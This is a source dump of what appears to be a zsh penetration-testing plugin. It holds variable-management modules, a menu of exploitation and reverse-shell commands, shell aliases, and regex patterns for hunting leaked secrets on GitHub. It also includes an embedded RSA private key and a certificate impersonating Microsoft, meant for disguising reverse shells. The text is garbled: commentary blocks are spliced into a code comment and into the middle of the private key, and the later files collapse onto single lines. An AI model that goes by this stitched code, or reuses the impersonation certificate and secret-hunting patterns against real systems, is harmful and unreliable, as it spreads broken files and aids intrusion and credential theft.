export __IMPACKET=$(cat ${__GLOBALS}/IMPACKET 2> /dev/null || echo "/usr/share/doc/python3-impacket/examples/")
qq-vars-global-set-impacket() {
  __ask "Set the full path to the python3-impacket/examples directory."
  __askpath __IMPACKET DIR /
  echo "${__IMPACKET}" > ${__GLOBALS}/IMPACKET
}
__check-impacket() {
  # guard the variable this checker is named for, not __PROJECT
  [[ -z "${__IMPACKET}" ]] && qq-vars-global-set-impacket
}

########## __EXT_PHP

export __EXT_PHP=$(cat ${__GLOBALS}/EXT_PHP 2> /dev/null || echo "php,phtml,pht,xml,inc,log,sql,cgi")
qq-vars-global-set-ext-php() {
  __ask "Enter a csv list of PHP server file extensions, ex: php,php3,pht"
  __askvar __EXT_PHP EXTENSIONS
  echo "${__EXT_PHP}" > ${__GLOBALS}/EXT_PHP
}
__check-ext-php() {
  [[ -z "${__EXT_PHP}" ]] && qq-vars-global-set-ext-php
}

########## __EXT_DOCS

# read from the same file the setter writes (EXT_DOCS)
export __EXT_DOCS=$(cat ${__GLOBALS}/EXT_DOCS 2> /dev/null || echo "doc,docx,pdf,xls,xlsx,txt,rtf,odt,ppt,pptx,pps,xml")
qq-vars-global-set-ext-docs() {
  __ask "Enter a csv list of document file extensions, ex: doc,xls,ppt"
  __askvar __EXT_DOCS EXTENSIONS
  echo "${__EXT_DOCS}" > ${__GLOBALS}/EXT_DOCS
}
__check-ext-docs() {
  [[ -z "${__EXT_DOCS}" ]] && qq-vars-global-set-ext-docs
}

########## __API_GITHUB

export __API_GITHUB="$(cat ${__GLOBALS}/API_GITHUB 2> /dev/null)"
qq-vars-global-set-api-github() {
  __ask "Enter your github API key below."
  __askvar __API_GITHUB API_GITHUB
  echo "${__API_GITHUB}" > ${__GLOBALS}/API_GITHUB
}
__check-api-github() {
  [[ -z "${__API_GITHUB}" ]] && qq-vars-global-set-api-github
}

########## __API_GOOGLE_DOMAINS

export __API_GOOGLE_DOMAINS="$(cat ${__GLOBALS}/API_GOOGLE_DOMAINS 2> /dev/null)"
qq-vars-global-set-api-google-domains() {
  __ask "Enter Google domains username and password for a dynamic DNS domain"
  local u && __askvar u USERNAME
  local p && __askvar p PASSWORD
  # assign the exported session variable (not a local copy); -n keeps the newline out of the encoded credential
  __API_GOOGLE_DOMAINS=$(echo -n "$u:$p" | base64)
  echo "${__API_GOOGLE_DOMAINS}" > ${__GLOBALS}/API_GOOGLE_DOMAINS
}
__check-api-google-domains() {
  [[ -z "${__API_GOOGLE_DOMAINS}" ]] && qq-vars-global-set-api-google-domains
}

########## __RESOLVERS

export __RESOLVERS=$(cat ${__GLOBALS}/RESOLVERS 2> /dev/null || echo "${__PAYLOADS}/resolvers.txt")
qq-vars-global-set-resolvers() {
  __ask "Set the full path to the file containing a list of resolvers."
  __askpath __RESOLVERS FILE $HOME
  echo "${__RESOLVERS}" > ${__GLOBALS}/RESOLVERS
}
__check-resolvers() {
  [[ -z "${__RESOLVERS}" ]] && qq-vars-global-set-resolvers
}

########## __NOTES

export __NOTES="$(cat ${__GLOBALS}/NOTES 2> /dev/null)"
qq-vars-global-set-notes() {
  __ask "Set the full path to the directory containing markdown notes."
  __askpath __NOTES DIR $HOME
  echo "${__NOTES}" > ${__GLOBALS}/NOTES
}
__check-notes() {
  [[ -z "${__NOTES}" ]] && qq-vars-global-set-notes
}

########## __MNU_UA

export __MNU_UA="$(cat ${__GLOBALS}/MNU_UA 2> /dev/null || echo "${__PAYLOADS}/user-agents.txt")"
qq-vars-global-set-mnu-ua() {
  __ask "Set the full path to the file containing a list of user agent strings"
  __askpath __MNU_UA FILE $HOME
  echo "${__MNU_UA}" > ${__GLOBALS}/MNU_UA
}

########## __MNU_WORDLISTS

export __MNU_WORDLISTS="$(cat ${__GLOBALS}/MNU_WORDLISTS 2> /dev/null || echo "${__PAYLOADS}/wordlists.txt")"
qq-vars-global-set-mnu-wordlists() {
  __ask "Set the full path to the file containing a list of favorite wordlists"
  __askpath __MNU_WORDLISTS FILE $HOME
  echo "${__MNU_WORDLISTS}" > ${__GLOBALS}/MNU_WORDLISTS
}

########## __TCP_PORTS

export __TCP_PORTS="$(cat ${__GLOBALS}/TCP_PORTS 2> /dev/null || echo "${__PAYLOADS}/tcp-ports.txt")"
qq-vars-global-set-tcp-ports() {
  __ask "Set the full path to the file containing a list of favorite TCP ports"
  __askpath __TCP_PORTS FILE $HOME
  echo "${__TCP_PORTS}" > ${__GLOBALS}/TCP_PORTS
}

########## __SHELL_SSL_CERT

export __SHELL_SSL_CERT="$(cat ${__GLOBALS}/SHELL_SSL_CERT 2> /dev/null || echo "${__PAYLOADS}/aka.ms.pem")"
qq-vars-global-set-shell-ssl-cert() {
  __ask "Set the full path to an impersonated SSL certificate in PEM format to use with reverse shells"
  __askpath __SHELL_SSL_CERT FILE $HOME
  echo "${__SHELL_SSL_CERT}" > ${__GLOBALS}/SHELL_SSL_CERT
}

########## __ALIASES

export __ALIASES="$(cat ${__GLOBALS}/ALIASES 2> /dev/null || echo "${__PAYLOADS}/aliases.rc")"
qq-vars-global-set-aliases() {
  __ask "Set the full path to a file containing shell aliases"
  __askpath __ALIASES FILE $HOME
  echo "${__ALIASES}" > ${__GLOBALS}/ALIASES
}

================================================
FILE: modules/qq-vars.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq-vars
#############################################################

qq-vars-help() {
  cat << "DOC"
qq-vars
-------
The vars namespace manages environment variables used in other functions.
These variables are set per session, but can be saved with qq-vars-save
and reloaded with qq-vars-load. The values are stored as files in .quiver/vars.
The menu options for some of the variables can be set using qq-vars-global,
such as the list of favorite user-agents or wordlists (qq-vars-global-help).

Variables
---------
__PROJECT:    the root directory used for all output, ex: /projects/example
__LOGBOOK:    the logbook.md markdown file used in qq-log commands
__IFACE:      the interface to use for commands, ex: eth0
__DOMAIN:     the domain to use for commands, ex: example.org
__NETWORK:    the subnet to use for commands, ex: 10.1.2.0/24
__RHOST:      the remote host or target, ex: 10.1.2.3, example: target.example.org
__RPORT:      the remote port; ex: 80
__LHOST:      the accessible local IP address, ex: 10.1.2.3
__LPORT:      the accessible local PORT, ex: 4444
__URL:        a target URL, example: https://target.example.org
__UA:         the user agent to use for commands, ex: googlebot
__WORDLIST:   path to a wordlist file, ex: /usr/share/wordlists/example.txt
__PASSLIST:   path to a wordlist for password brute forcing, ex: /usr/share/wordlists/rockyou.txt

Commands
--------
qq-vars:          alias qv, list all current variable values
qq-vars-save:     alias qvs, save all current variable values ($HOME/.quiver)
qq-vars-load:     alias qvl, restores all current variable values ($HOME/.quiver)
qq-vars-clear:    clears all current variable values
qq-vars-set-*:    used to set each individual variable

DOC
}

qq-vars() {
  echo "$(__cyan __PROJECT: ) ${__PROJECT}"
  echo "$(__cyan __LOGBOOK: ) ${__LOGBOOK}"
  echo "$(__cyan __IFACE: ) ${__IFACE}"
  echo "$(__cyan __DOMAIN: ) ${__DOMAIN}"
  echo "$(__cyan __NETWORK: ) ${__NETWORK}"
  echo "$(__cyan __RHOST: ) ${__RHOST}"
  echo "$(__cyan __RPORT: ) ${__RPORT}"
  echo "$(__cyan __LHOST: ) ${__LHOST}"
  echo "$(__cyan __LPORT: ) ${__LPORT}"
  echo "$(__cyan __URL: ) ${__URL}"
  echo "$(__cyan __UA: ) ${__UA}"
  echo "$(__cyan __WORDLIST: ) ${__WORDLIST}"
  echo "$(__cyan __PASSLIST: ) ${__PASSLIST}"
}
alias qv="qq-vars"

qq-vars-clear() {
  __PROJECT=""
  __LOGBOOK=""
  __IFACE=""
  __DOMAIN=""
  __NETWORK=""
  __RHOST=""
  __RPORT=""
  __LHOST=""
  __LPORT=""
  __URL=""
  __UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
  __WORDLIST=""
  __PASSLIST=""
}

qq-vars-save() {
  echo "${__PROJECT}" > $__VARS/PROJECT
  echo "${__LOGBOOK}" > $__VARS/LOGBOOK
  echo "${__IFACE}" > $__VARS/IFACE
  echo "${__DOMAIN}" > $__VARS/DOMAIN
  echo "${__NETWORK}" > $__VARS/NETWORK
  echo "${__RHOST}" > $__VARS/RHOST
  echo "${__RPORT}" > $__VARS/RPORT
  echo "${__LHOST}" > $__VARS/LHOST
  echo "${__LPORT}" > $__VARS/LPORT
  echo "${__URL}" > $__VARS/URL
  echo "${__UA}" > $__VARS/UA
  echo "${__WORDLIST}" > $__VARS/WORDLIST
  echo "${__PASSLIST}" > $__VARS/PASSLIST
  qq-vars
}
alias qvs="qq-vars-save"

qq-vars-load() {
  __PROJECT=$(cat $__VARS/PROJECT)
  __LOGBOOK=$(cat $__VARS/LOGBOOK)
  __IFACE=$(cat $__VARS/IFACE)
  __DOMAIN=$(cat $__VARS/DOMAIN)
  __NETWORK=$(cat $__VARS/NETWORK)
  __RHOST=$(cat $__VARS/RHOST)
  __RPORT=$(cat $__VARS/RPORT)
  __LHOST=$(cat $__VARS/LHOST)
  __LPORT=$(cat $__VARS/LPORT)
  __URL=$(cat $__VARS/URL)
  __UA=$(cat $__VARS/UA)
  __WORDLIST=$(cat $__VARS/WORDLIST)
  __PASSLIST=$(cat $__VARS/PASSLIST)
  qq-vars
}
alias qvl="qq-vars-load"

########## __PROJECT

export __PROJECT=""
qq-vars-set-project() {
  __ask "Set the full path to the project root directory where all command output will be directed"
  local d && __askpath d "PROJECT DIR" ${__PROJECT}
  [[ "$d" == "~"* ]] && __err "~ not allowed, use the full path" && return
  __PROJECT=$d
  mkdir -p ${__PROJECT}
}
__check-project() {
  [[ -z "${__PROJECT}" ]] && qq-vars-set-project
}

########## __LOGBOOK

export __LOGBOOK=""
qq-vars-set-logbook() {
  __ask "Set the full path to the directory of the logbook file (filename not included)."
  # __askpath assigns into the variable named by its first argument; it does not print the value
  local d && __askpath d DIR $HOME
  [[ "$d" == "~"* ]] && __err "~ not allowed, use the full path" && return
  mkdir -p $d
  __LOGBOOK="${d}/logbook.md"
  if [[ -f "${__LOGBOOK}" ]]; then
    __warn "${__LOGBOOK} already exists, set as active log"
  else
    touch ${__LOGBOOK}
    echo "# Logbook" >> ${__LOGBOOK}
    echo " " >> ${__LOGBOOK}
    __ok "${__LOGBOOK} created."
  fi
}
__check-logbook() {
  [[ -z "${__LOGBOOK}" ]] && qq-vars-set-logbook
}

########## __IFACE

export __IFACE=""
qq-vars-set-iface() {
  if [[ -z "${__IFACE}" ]]
  then
    __ask "Choose an interface: "
    __IFACE=$(__menu $(ip addr list | awk -F': ' '/^[0-9]/ {print $2}'))
  else
    __prefill __IFACE IFACE ${__IFACE}
  fi
}
__check-iface() {
  [[ -z "${__IFACE}" ]] && qq-vars-set-iface
}

########## __DOMAIN

export __DOMAIN=""
qq-vars-set-domain() {
  __prefill __DOMAIN DOMAIN ${__DOMAIN}
}
__check-domain() {
  [[ -z "${__DOMAIN}" ]] && qq-vars-set-domain
}

########## __NETWORK

export __NETWORK=""
qq-vars-set-network() {
  __prefill __NETWORK NETWORK ${__NETWORK}
}
__check-network() {
  [[ -z "${__NETWORK}" ]] && qq-vars-set-network
}

########## __RHOST

export __RHOST=""
qq-vars-set-rhost() {
  __prefill __RHOST RHOST ${__RHOST}
}

########## __RPORT

export __RPORT=""
qq-vars-set-rport() {
  __prefill __RPORT RPORT ${__RPORT}
}

########## __LHOST

export __LHOST=""
qq-vars-set-lhost() {
  if [[ -z $__LHOST ]]
  then
    __ask "Choose a local IP address: "
    __LHOST=$(__menu $(ip addr list | grep -e "inet " | cut -d' ' -f6 | cut -d'/' -f1))
  else
    __prefill __LHOST LHOST ${__LHOST}
  fi
}

########## __LPORT

export __LPORT=""
qq-vars-set-lport() {
  __prefill __LPORT LPORT ${__LPORT}
}

########## __URL

export __URL=""
qq-vars-set-url() {
  local u && __prefill u URL ${__URL}
  # strip a trailing slash so paths can be appended to __URL
  __URL=$(echo ${u} | sed 's/\/$//')
}

########## __UA

export __UA="Mozilla/5.0"
qq-vars-set-ua() {
  # split the menu on newlines only (user agents contain spaces); local so the
  # session's IFS is not changed
  local IFS=$'\n'
  __ask "Choose a user agent: "
  __UA=$(__menu $(cat ${__MNU_UA}))
}
__check-ua() {
  [[ -z "${__UA}" ]] && qq-vars-set-ua
}

########## __WORDLIST

export __WORDLIST=""
qq-vars-set-wordlist() {
  if [[ -z $__WORDLIST ]]
  then
    __ask "Choose a wordlist: "
    __WORDLIST=$(__menu $(cat ${__MNU_WORDLISTS}))
  else
    __prefill __WORDLIST WORDLIST ${__WORDLIST}
  fi
}

qq-vars-set-wordlist-web() {
  __ask "Choose a wordlist: "
  __WORDLIST=$(__menu $(find /usr/share/seclists/Discovery/Web-Content | sort))
}

qq-vars-set-wordlist-dns() {
  __ask "Choose a wordlist: "
  __WORDLIST=$(__menu $(find /usr/share/seclists/Discovery/DNS | sort))
}

########## __PASSLIST

export __PASSLIST="/usr/share/wordlists/rockyou.txt"
qq-vars-set-passlist() {
  __ask "Choose a passlist: "
  __PASSLIST=$(__menu $(find /usr/share/seclists/Passwords | sort))
}

# helpers

export __THREADS
__check-threads() {
  __askvar __THREADS THREADS
}

export __USER
__check-user() {
  __askvar __USER USER
}

export __SHARE
__check-share() {
  __askvar __SHARE SHARE
}

export __ORG
__check-org() {
  __askvar __ORG ORG
}

export __ASN
__check-asn() {
  __askvar __ASN ASN
}

# project sub-directories derived from the current target variables

__netpath() {
  __check-project
  local net=$(echo ${__NETWORK} | cut -d'/' -f1)
  local result=${__PROJECT}/networks/${net}
  mkdir -p "${result}"
  echo "${result}"
}

__hostpath() {
  __check-project
  local result=${__PROJECT}/hosts/${__RHOST}
  mkdir -p "${result}"
  echo "${result}"
}

__urlpath() {
  __check-project
  local host=$(echo ${__URL} | cut -d'/' -f3)
  local result=${__PROJECT}/hosts/${host}
  mkdir -p "${result}"
  echo "${result}"
}

__dompath() {
  __check-project
  local result=${__PROJECT}/domains/${__DOMAIN}
  mkdir -p "${result}"
  echo "${result}"
}

================================================
FILE: modules/qq.zsh
================================================
#!/usr/bin/env zsh

#############################################################
# qq
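The path helpers above build project sub-directories straight from `__URL`, `__RHOST` and `__NETWORK` (`cut -d'/' -f3` for the URL host), so a URL with credentials, a port or an IPv6 literal, or a target value containing `..` or `/`, ends up in the directory name. The following is an added example, not code from the quiver project, of a host extractor and a directory builder that refuse names able to leave the project tree; the function names and the sample URLs are assumptions of the example.

```shell
#!/bin/sh
# Added example (not part of quiver): derive a bare hostname from a URL and a
# project sub-directory from a target name, refusing values that could escape
# the project root.

# url_host URL -> bare, lower-cased host with scheme, userinfo, port, path and
# query removed. Accepts scheme-less input and bracketed IPv6 literals.
url_host() {
    h=$1
    # drop the scheme only when the text before "://" contains no "/"
    case ${h%%://*} in
        */*) ;;
        *)   h=${h#*://} ;;
    esac
    h=${h%%/*}         # drop path (and anything after it)
    h=${h%%\?*}        # drop a query that follows the host directly
    h=${h##*@}         # drop userinfo (user:password@)
    case $h in
        \[*\]*) h=${h#\[}; h=${h%%\]*} ;;   # [2001:db8::1]:8080 -> 2001:db8::1
        *)      h=${h%%:*} ;;               # host:8443 -> host
    esac
    printf '%s\n' "$h" | tr '[:upper:]' '[:lower:]'
}

# target_dir PROJECT KIND NAME -> PROJECT/KIND/NAME
# Returns 1 (printing nothing) when NAME is empty, ".", "..", contains a "/" or
# any character outside the hostname/IP alphabet, so the result always lies
# below PROJECT/KIND.
target_dir() {
    proj=$1
    kind=$2
    name=$3
    case $name in
        ''|.|..|*/*|*[!A-Za-z0-9.:_-]*) return 1 ;;
    esac
    printf '%s/%s/%s\n' "$proj" "$kind" "$name"
}

# url_dir PROJECT URL -> PROJECT/hosts/<host>, the __urlpath layout with the checks applied
url_dir() {
    target_dir "$1" hosts "$(url_host "$2")"
}
```

In a quiver-style helper, `mkdir -p` would follow a successful `target_dir`; when it returns 1 the caller should report the rejected value instead of creating anything.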
#############################################################

qq-help() {
  cat << "DOC"
qq
--
The qq namespace is the root of all other namespaces that can be accessed with tab-completion.
To get started, explore the qq--help commands.
Install dependencies per namespace, using the qq--install commands or install all dependencies using qq-install-all.

Variables
---------
__VERSION   Current version of the Quiver plugin
__PLUGIN    Full path to the Quiver oh-my-zsh plugin directory

Commands
--------
qq-update:      git pull the latest (MASTER branch) version of Quiver
qq-status:      check the current status of the locally cloned Quiver repository
qq-whatsnew:    display the latest release notes
qq-debug:       display the local diagnostic log

Namespaces
----------
Quiver is organized in a tree of namespaces that are accessible via "qq-" with tab completion and search.
Each namespace has its own install and help commands.

Install and Configuration
-------------------------
qq-install-            Installers for commonly used applications and global installer for all dependencies
qq-notes-              Configure and read your markdown notes
qq-vars-global-        Persistent environment variables used in all commands, all sessions

Utility
---------
qq-encoding-           Used for encoding / decoding data
qq-kali-               Variety of commands for managing Kali linux

Engagement / Project / Bounty
-----------------------------
qq-log-                Configure and setup a logbook for current engagement
qq-vars-               Per-session, per-engagement variables used in all commands
qq-project-            Commands to define scope and manage project data
qq-project-custom-     Commands for custom project directory scaffolding

Recon Phase
-----------
qq-recon-org-          Recon commands for organization files and data
qq-recon-github-       Recon commands for searching github repositories
qq-recon-networks-     Recon commands for identifying an organization's networks
qq-recon-domains-      Recon commands for horizontal domain enumeration
qq-recon-subs-         Recon commands for vertical sub-domain enumeration

Active Enumeration Phase
------------------------
qq-enum-network-       Enumerate and scan networks
qq-enum-host-          Enumerate and scan an individual host
qq-enum-dhcp-          Enumerate DHCP services
qq-enum-dns-           Enumerate DNS services
qq-enum-ftp-           Enumerate FTP services
qq-enum-kerb-          Enumerate Kerberos services
qq-enum-ldap-          Enumerate LDAP and Active Directory services
qq-enum-mssql-         Enumerate MSSQL database services
qq-enum-mysql-         Enumerate MYSQL database services
qq-enum-nfs-           Enumerate NFS shares and services
qq-enum-oracle-        Enumerate Oracle database services
qq-enum-pop3-          Enumerate POP3 services
qq-enum-rdp-           Enumerate RDP services
qq-enum-smb-           Enumerate SMB services
qq-enum-web-           Enumerate web servers and services
qq-enum-web-aws-       Enumerate AWS hosted services
qq-enum-web-dirs-      Enumerate directories and files
qq-enum-web-elastic-   Enumerate elastic search services
qq-enum-web-fuzz-      Fuzz inputs such as forms, cookies and headers
qq-enum-web-js-        Mine javascript files for secrets
qq-enum-web-php-       Enumerate php web servers
qq-enum-web-ssl-       Enumerate SSL certs and services
qq-enum-web-vuln-      Check for common web vulnerabilities
qq-enum-web-xss-       XSS helpers

Exploitation Phase
------------------
qq-srv-                Commands for spawning file hosting services
qq-exploit-            Commands for compiling exploits
qq-shell-tty-          Commands for upgrading shells to tty
qq-shell-handlers-     Commands for spawning reverse shell handlers
qq-shell-handlers-msf- Commands for spawning reverse shells with Metasploit

Post-Exploitation Phase
-----------------------
qq-pivot-              Commands for pivoting with ssh

DOC
}

qq-update() {
  cd $HOME/.oh-my-zsh/custom/plugins/quiver
  git pull
  rm $__REMOTE_VER
  rm $__REMOTE_CHK
  cd - > /dev/null
  source $HOME/.zshrc
}

qq-status() {
  cd $HOME/.oh-my-zsh/custom/plugins/quiver
  git status | grep On | cut -d" " -f2,3
  cd - > /dev/null
}

qq-whatsnew() {
  cat $__PLUGIN/RELEASES.md
}

qq-debug() {
  cat ${__LOGFILE}
}

##### Output Helpers

__cyan() echo "$fg[cyan]$@ $reset_color"
__green() echo "$fg[green]$@ $reset_color"
__blue() echo "$fg[blue]$@ $reset_color"
__yellow() echo "$fg[yellow]$@ $reset_color"
# the red colour helper: __err below is built on it, so it must not share its name
__red() echo "$fg[red]$@ $reset_color"

__info() __blue "[*] $@"
__ok() __green "[+] $@"
__warn() __yellow "[!] $@"
__err() __red "[X] $@"

##### Input Helpers

__ask() __yellow "$@"
__prompt() __cyan "[?] $@"

# __askvar VARNAME QUESTION: read a line into the variable named VARNAME
__askvar() {
  local retval=$1
  local question=$2
  local tmpval
  read "tmpval?$fg[cyan]${question}:$reset_color "
  # assign by name; the value is expanded by the assignment, not re-parsed by eval,
  # so quotes or ";" typed by the user cannot run as code
  eval "${retval}=\$tmpval"
}

# __askpath VARNAME QUESTION PREFILL: line-edited path input, trailing slash removed
__askpath() {
  local retval=$1
  local question=$2
  local prefill=$3
  local tmpinput=$(rlwrap -S "$fg[cyan]${question}: $reset_color" -P "${prefill}" -e '' -c -o cat)
  local tmpval=$(echo "${tmpinput}" | sed 's/\/$//' )
  eval "${retval}=\$tmpval"
}

# __prefill VARNAME QUESTION PREFILL: line-edited input with an editable default
__prefill() {
  local retval=$1
  local question=$2
  local prefill=$3
  local tmpval=$(rlwrap -S "$fg[cyan]${question}: $reset_color" -P "${prefill}" -e '' -o cat)
  eval "${retval}=\$tmpval"
}

# __check-proceed: Yes/Cancel menu, returns 0 to proceed
__check-proceed() {
  PS3="$fg[cyan]Select: $reset_color"
  COLUMNS=10
  select yn in "Yes" "Cancel"; do
    case $yn in
      Yes) return 0;;
      *) return 1;;
    esac
  done
}

# __menu ITEM...: numbered selection menu, prints the chosen item
__menu() {
  PS3="$fg[cyan]Select: $reset_color"
  COLUMNS=10
  select o in $@; do break; done
  echo ${o}
}

##### String Helpers

__trim-slash() {
  echo $1 | sed 's/\/$//'
}

__trim-quotes() {
  echo $1 | tr -d \"
}

__trim-newline() {
  echo $1 | tr -d "\n"
}

# __rand [N]: N (default 16) random alphanumeric characters
__rand() {
  if [ "$#" -eq "1" ]
  then
    head /dev/urandom | tr -dc A-Za-z0-9 | head -c $1 ; echo ''
  else
    head /dev/urandom | tr -dc A-Za-z0-9 | head -c 16 ; echo ''
  fi
}

##### Tool Helpers

# __msf: reads msfconsole commands from stdin (a heredoc) and queues msfconsole -x with them
__msf() {
  local msfcmd=$(cat $@)
  print -z "msfconsole -n -q -x \"${msfcmd}\" "
}

================================================
FILE: payloads/aka.ms.pem
================================================
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQC2E+hNdtXUWpcB4qJz+afQmZNUB7V6gFViEejmU9SXuOirAVLl
Q1cz2xwkyCb+xyGpEC51O4Hxb9bXEyV9JtJFjAlbehEkj+jFRIqEAXEd1UliFuRa
gx4rwv0SpQWr3zu/jS5m+JdKnxdNISMFUR2G9bf8wcnNqhbtr6ByFyjsPQIDAQAB
AoGBAIXWGkKeoEzojelf2sPe9kC6MnZo+Dfkj154BbcQVct0qunQHkvRdQ7z9zr+
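Two of the helpers above deserve a closer look: the input helpers assign through `eval` with the typed value interpolated into the command text, so a quote or `;` in the input (a password with an apostrophe, for instance) is parsed as shell code, and `__rand` takes its randomness from `head /dev/urandom`, which stops after ten newline bytes and therefore yields far fewer than the requested characters once the length exceeds a few hundred. The following is an added example, not code from the quiver project, of a by-name assignment that never re-parses the value and of a token generator that reads until it has enough characters; the function names are assumptions of the example.

```shell
#!/bin/sh
# Added example (not part of quiver): safe assign-by-name and a bounded random
# token helper, in POSIX sh.

# set_var NAME VALUE: assign VALUE to the variable called NAME.
# The eval text is "NAME=$2": only the name is interpolated, the value is
# expanded by the assignment itself and is never parsed as shell syntax.
set_var() {
    case $1 in
        ''|[!A-Za-z_]*|*[!A-Za-z0-9_]*) return 1 ;;   # refuse anything that is not an identifier
    esac
    eval "$1=\$2"
}

# rand_token [N]: N (default 16) random characters from A-Za-z0-9.
# tr keeps reading /dev/urandom until head has collected N characters, so the
# result is never shorter than requested; LC_ALL=C keeps tr byte-oriented.
rand_token() {
    n=${1:-16}
    LC_ALL=C tr -dc 'A-Za-z0-9' < /dev/urandom | head -c "$n"
    echo
}

# token_is_valid TOKEN N: 0 when TOKEN has exactly N alphanumeric characters
token_is_valid() {
    [ "${#1}" -eq "$2" ] || return 1
    case $1 in
        *[!A-Za-z0-9]*) return 1 ;;
    esac
    return 0
}
```

`set_var` is the drop-in shape for an `__askvar`-style helper: validate the destination name, then let the assignment expand the value. `rand_token 10` fits where a generated access password is needed, such as the updog password in qq-srv-updog.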
ONO8MfzgnRWlOT3sVIJhW4Qj/hjNkIVpoGzRIpcGoW3L0XunJ1q6VaS+ESQUx0pY juyNmRYRaxSYrRzPolDqhX11fNM1Cswm5rrb2msvBBf7q/yNAkEA2Ub6za/tScaQ +xiLnmGwHSH9w0mKIm/XAuDFm1kOuId9xKOiwK5/7gLuan+rxSxc0FhoMYsB7nsN zgzJywasMwJBANaG/eXdNZYdfAGCkcpCmgUxiYx6/gRy3VX+uhMvaqBihBoGChiJ NVUs6ybyIJbh52fphPvfv2f6aIW5myFOlc8CQDTdymSFq8zJnbkazc3povpTrPT5 Tbz3TW+L1UjpMGXBwd44mn8bdlEpMW2ERv0gwCyJdkCnu/6UvlUmU2ss4nUCQAnn vb1pU1oVDm67aqPeI2JuAR3dZ/EopJOd6VWNcOzq35KcCMdNPosqQclQkLSmxZqE q8E9eYcBhuX1xfXpvP0CQBYNy279VufEzjkyjtv7Gc+6LjNoEcYOXQjffMN0gpwN +uc9FlSagHHs9hKLQk/4vIEeTqz008pwtF0XLy1dtdU= -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIICyDCCAjGgAwIBAgIUAcIAbh51mEfqQLiFtggAAABuHn8wDQYJKoZIhvcNAQEL BQAwgYcxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJXQTEQMA4GA1UEBxMHUmVkbW9u ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQLExVNaWNy b3NvZnQgQ29ycG9yYXRpb24xGTAXBgNVBAMTEGdvLm1pY3Jvc29mdC5jb20wHhcN MTkwOTA2MTkzNzIxWhcNMjEwOTA2MTkzNzIxWjCBhzELMAkGA1UEBhMCVVMxCzAJ BgNVBAgTAldBMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQg Q29ycG9yYXRpb24xHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEZMBcG A1UEAxMQZ28ubWljcm9zb2Z0LmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC gYEAthPoTXbV1FqXAeKic/mn0JmTVAe1eoBVYhHo5lPUl7joqwFS5UNXM9scJMgm /schqRAudTuB8W/W1xMlfSbSRYwJW3oRJI/oxUSKhAFxHdVJYhbkWoMeK8L9EqUF q987v40uZviXSp8XTSEjBVEdhvW3/MHJzaoW7a+gchco7D0CAwEAAaMvMC0wDAYD VR0TAQH/BAIwADAdBgNVHQ4EFgQUg2JaOA9UjImKCHybc5Bqu8YS40cwDQYJKoZI hvcNAQELBQADgYEAHkTVXl44F+tN0WWn3rbIUosimlbSYd6S9yLfCPGhpBdCv8GF 3jfFULoiFv/L79KuNfZ/RElR+xtqnukrg3C9NYCC3mRymZRMnjnoFjDG//AoeLsU 4802Opg2opg+OG23YFvz01rmdiHtUFM/0S1V4p3oiCDkwdz24E6/60OQu0A= -----END CERTIFICATE----- ================================================ FILE: payloads/aliases.rc ================================================ #nav alias cd..="cd ../" alias cls="clear" alias path="echo -e \${PATH//:/\\n}" alias cp="cp -iv" alias mv="mv -iv" alias lf="ls -l | egrep -v '^d'" alias ldir='ls -d */' #sys alias mounted="sudo mount | column -t" alias df="df -mTh --total" alias 
free="free -th" alias ps="ps auxf" alias psg="ps aux | grep -v grep | grep -i -e VSZ -e " #network alias pcap="sudo tcpdump -r" alias myip="curl icanhazip.com" alias grip="grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'" #proton vpn alias pv-check="sudo pip3 install protonvpn-cli --upgrade" alias pvt="sudo protonvpn c -f" alias pvu="sudo protonvpn c -f -p udp" alias pvd="sudo protonvpn disconnect" alias pvs="sudo protonvpn status" #zsh alias zprc="cat ~/.zshrc" alias zerc="nano ~/.zshrc" alias zsrc="source ~/.zshrc" # files and directory alias linestocsv="paste -s -d, -" alias csvtolines="tr ',' '\n'" alias sfu="sort -u " alias sfip="sort -u | sort -V " alias sfuc="sort | uniq -c | sort -n" alias dos2unix="tr -d '\015' " alias unix2dos="sed -e 's/$/\r/'" # out alias trim1="sed 's/.$//'" alias trim2="sed 's/..$//'" alias trim3="sed 's/...$//'" alias trim4="sed 's/....$//'" # tools alias hp="httprobe -t 3000 -c 50 " ================================================ FILE: payloads/github-dorks-commits.txt ================================================ "Slack Token": "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", "RSA private key": "-----BEGIN RSA PRIVATE KEY-----", "SSH (OPENSSH) private key": "-----BEGIN OPENSSH PRIVATE KEY-----", "SSH (DSA) private key": "-----BEGIN DSA PRIVATE KEY-----", "SSH (EC) private key": "-----BEGIN EC PRIVATE KEY-----", "PGP private key block": "-----BEGIN PGP PRIVATE KEY BLOCK-----", "Facebook Oauth": "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\\s][0-9a-f]{32}['\"\\s]", "Twitter Oauth": "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]", "GitHub": "[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\"\\s][0-9a-zA-Z]{35,40}['\"\\s]", "Google Oauth": "(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")", "AWS API Key": "AKIA[0-9A-Z]{16}", "Heroku API Key": "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}", "Generic Secret": 
